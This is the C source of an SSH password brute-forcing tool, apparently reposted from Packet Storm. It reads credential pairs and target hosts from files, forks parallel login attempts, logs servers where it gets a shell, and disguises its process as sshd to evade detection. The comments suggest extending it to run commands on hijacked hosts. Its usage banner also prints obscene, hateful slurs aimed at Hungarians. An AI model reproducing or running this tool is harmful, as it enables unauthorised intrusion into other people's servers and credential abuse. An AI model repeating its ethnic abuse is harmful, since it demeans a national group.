FULG SSH cracking utility.
43ec4b963e9750762aa06b6d1903f3f72afdf9ed91044a51a0e5b7f95760a744/*
* by FULG of #texter :)
* greetings to most famous Romanian h4x0rs :
* lover4you, ps, LordNikon, iptables, sonkeriki, starters, zorg, pentaguard
* rou:
* Ca sa il compilati trebuie sa aveti instalat
* https://packetstormsecurity.org/crypt/LIBS/ssh/libssh-0.1.tgz ;
* Dupa ce instalezi libssh cp /usr/local/lib/libssh.so /usr/lib/
* gcc -o brutessh fulg.c -I /usr/local/include -L /usr/local/lib/ -lssh -lpthread
*
* Mai multe bunatati pe www.fulg.home.ro !
* Editeaza pass.txt in felul urmator :
* user pass
* user2 pass2
* user3 pass3
*
* Ce face brutessh-ul nostru :
* - isi ascunde procesul in ps
* - poti sa il modifici sa iti execute comenzi pe serverul gasit :)
* - nu mai da erori segmault default , gata !
* - are culori frumoase si un mesaj si mai frumos pt unguri
*
* eng:
* some code ripped from zorg's brutessh.c
* -- this was private for 3 years!
* edit the pass.txt in the next format :
* user1 pass1
* user2 pass2
* user3 pass3
* Cheers.
* - it fakes the proccesss name in ps list
* - it gets users/password from a list
* - some bugfixes
* - optimized
* TODO:
* - fix some bugs
* - make it to execute commands on the host it hacks.
*
*/
#include <stdio.h>
#include <arpa/inet.h>
#include <libssh/libssh.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#define ALB "\033[1;37m"
#define ALB2 "\033[5;37m"
#define NORM "\033[00;00m"
#define BOLD "\033[00;01m"
#define ROSU "\033[01;31m"
#define GALBEN "\033[01;33m"
#define VERDE "\033[01;32m"
#define ALBASTRU "\033[01;34m"
#define FAKE "/usr/sbin/sshd" // cum vrei sa apara in ps ? :D
int flag,where;
int shell(SSH_SESSION *session){
struct timeval;
int err;
BUFFER *readbuf=buffer_new();
time_t start;
CHANNEL *channel;
channel = open_session_channel(session,1000,1000);
if(isatty(0)) // verificam daca avem tty
err=channel_request_pty(channel); // cerem un pty
err= channel_request_shell(channel); // cerem shell
start=time(0); // start teh timer
while (channel->open!=0) // channel open ..
{
usleep(500000); // sleep
err=channel_poll(channel,0);
if(err>0){ // do we have a shell ?
err=channel_read(channel,readbuf,0,0); //read teh buffer in the channel
}
else
{
if(start+5<time(0))
{
return 1;
}
}
}
return 0;
}
/* here comes the nice part
* This function checks auth
*/
void checkauth(char *user,char *password,char *host) {
struct hostent *hp;struct in_addr *myaddr;
SSH_SESSION *session; // declare some session thingies
SSH_OPTIONS *options;
int argc=1;
char *argv[]={"none"};
FILE *vulnf,*nolog; // file where we log the shizz
where++;
alarm(10);
options=ssh_getopt(&argc,argv);
options_set_username(options,user);
options_set_host(options,host);
session=ssh_connect(options);
if(!session) return ;
if(ssh_userauth_password(session,NULL,password) != AUTH_SUCCESS) // if no shell, disconnect.
{
ssh_disconnect(session);
return;
}
if(shell(session)) // if we got a session, then we printf() it and log it =>
{
if(!flag){
myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
myaddr->s_addr=inet_addr(host);
hp = gethostbyaddr((char *) myaddr,4,AF_INET);
if((hp!=NULL)){
vulnf=fopen("vuln.txt","a+");
fprintf(vulnf,"%s:%s %s | %sn",user,password,host,hp->h_name);
printf("n-> %s:%s %s | %sn",user,password,host,hp->h_name);}
else{
vulnf=fopen("vuln.txt","a+");
fprintf(vulnf,"%s:%s %s | host did not resolven",user,password,host);
printf("n-> %s:%s %s | host did not resolven",user,password,host);
}
// flag=1;
fclose(vulnf);
}
}
else{ // if ssh login is denied, printf() && log it
myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
myaddr->s_addr=inet_addr(host);
hp = gethostbyaddr((char *) myaddr,4,AF_INET);
nolog=fopen("nobash.txt","a+");
if((hp!=NULL)){
fprintf(nolog,"%s %s %s | %sn",user,password,host,hp->h_name);
printf("nnobash -> %s %s %s | %sn",user,password,host,hp->h_name);}
else
{
fprintf(nolog,"%s %s %s | no hostn",user,password,host);
printf("nnobash -> %s %s %s | no hostn",user,password,host);}
fclose(nolog);
}
}
int main(int argc, char **argv)
{
FILE *fp,*passf;
char *c;
char buff[4096];
char *a[80196], nutt[4096], *temp, *t, *string;
malloc(sizeof(a));
malloc(sizeof(nutt));
int count = 0, i;
int numforks,maxf;
if((passf=fopen("pass.txt","r")) == NULL)
{ // here we scan the pass file for users and passwords.
printf("FATAL: Cant find pass.txtn");
return -1;
}
while (fgets(nutt,2024,passf))
{
while (t = strchr (nutt,'n'))
*t = '.';
temp = strtok (nutt, " ");
string = strdup (temp);
a[count++]=string;
while (temp = strtok (NULL, " "))
{
string = strdup (temp);
a[count++]=string;
}
}
fclose(passf);
if(argc!=2)
{
printf(ROSU"@lizard !\n");
printf(ALB"--> SSHD Bruteforce by FULG of #texter research group!\n");
printf(ALB"--> gretings : zorg, sonkeriki, lordnikon, lover4you, starters, zorg, iptables s.a.m.d\n");
printf("\n");
printf(GALBEN" .-. \n");
printf(GALBEN" |-| \n");
printf(GALBEN" | | <- Mesaj pt bozgori: \n");
printf(GALBEN" _.-|=|-. <- Cu multa dragoste si stima \n");
printf(GALBEN" / | | | | <- Va uram un calduros SA VA FUTEM IN GURA\n");
printf(GALBEN" | |\ <- Vreti autonomie ? SUGETI PULA ! \n");
printf(GALBEN" | / <- Vreti ungaria ? EMIGRATI ! \n");
printf("\n");
printf(NORM"%s <max forks>\n",argv[0]);
printf("\n");
exit(0);
}
if((fp=fopen("scan.log","r"))==NULL) exit(printf("FATAL: Cannot open scan.logn"));
maxf=atoi(argv[1]);
strcpy(argv[0],FAKE); // fake the proccess name.
while(fgets(buff,sizeof(buff),fp))
{
c=strchr(buff,'n');
if(c!=NULL) *c='.';
if (!(fork()))
{
where=0;
// printf("--> attacking %s",buff);
for (i=0; i<count; i=i+2){
// printf("--> Trying %s:%s %sn",a[i],a[i+1],buff);
checkauth(a[i],a[i+1],buff); // try to auth
}
exit(0);
}
else
{
numforks++;
if (numforks > maxf)
for (numforks; numforks > maxf; numforks--)
wait(NULL);
}
}
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed